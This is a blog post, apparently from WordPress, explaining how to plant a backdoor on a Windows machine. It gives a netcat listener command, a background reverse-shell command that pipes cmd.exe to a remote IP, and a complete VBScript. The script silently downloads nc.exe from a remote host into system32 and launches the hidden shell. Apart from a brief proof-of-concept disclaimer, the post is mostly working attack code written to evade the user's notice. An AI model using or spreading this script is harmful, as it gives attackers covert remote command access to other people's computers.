Create a backdoor into a Windows system

Using VBScript and netcat it is quite simple to create a basic backdoor into a users system with the priviledges of the user that ran the script. It’s a very basic concept and all it does it download the netcat program (nc.exe) from a trusted website into the users c:\windows\system32 folder. What this does is allow you to run netcat from the command line without dealing with the full location of nc.exe. Once the file is in the system32 folder it can simple be run from any command prompt.

***This is a proof of concept and should not be used for illegal purposes. Only use this in your own test environment and I take no responsibility if you mess something up with this***

To set this up, you need to have a computer running netcat waiting for the incomming connection. To do that just run a simple command such as:

nc -l 1337

That’s when we tell the script to run the following netcat command:

nc -d 10.0.0.8 1337 -e cmd.exe

What this does is tell netcat to connect to the IP 10.0.0.8 on TCP port 1337. The -e switch tells netcat to execute cmd.exe and output it to the server waiting for the connection. The -d switch tells netcat to run in the background in a Windows environment. The user won’t even know it’s running without checking the process list.

Here’s an example script that will automatically download nc.exe, write it to c:\windows\system32 and then execute the netcat command to connect to the remote server:

' Set your settings
    strFileURL = "http://10.0.0.10/nc.exe"
    strHDLocation = "C:\WINDOWS\system32\nc.exe"
 
' Fetch the file
    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
 
    objXMLHTTP.open "GET", strFileURL, false
    objXMLHTTP.send()
 
    If objXMLHTTP.Status = 200 Then
      Set objADOStream = CreateObject("ADODB.Stream")
      objADOStream.Open
      objADOStream.Type = 1 'adTypeBinary
 
      objADOStream.Write objXMLHTTP.ResponseBody
      objADOStream.Position = 0    'Set the stream position to the start
 
      Set objFSO = Createobject("Scripting.FileSystemObject")
        If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
      Set objFSO = Nothing
 
      objADOStream.SaveToFile strHDLocation
      objADOStream.Close
      Set objADOStream = Nothing
    End if
 
    Set objXMLHTTP = Nothing

Set objShell = CreateObject("WScript.Shell")

' Execute the connection
objShell.Exec("nc -d 10.0.0.8 1337 -e cmd.exe")
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s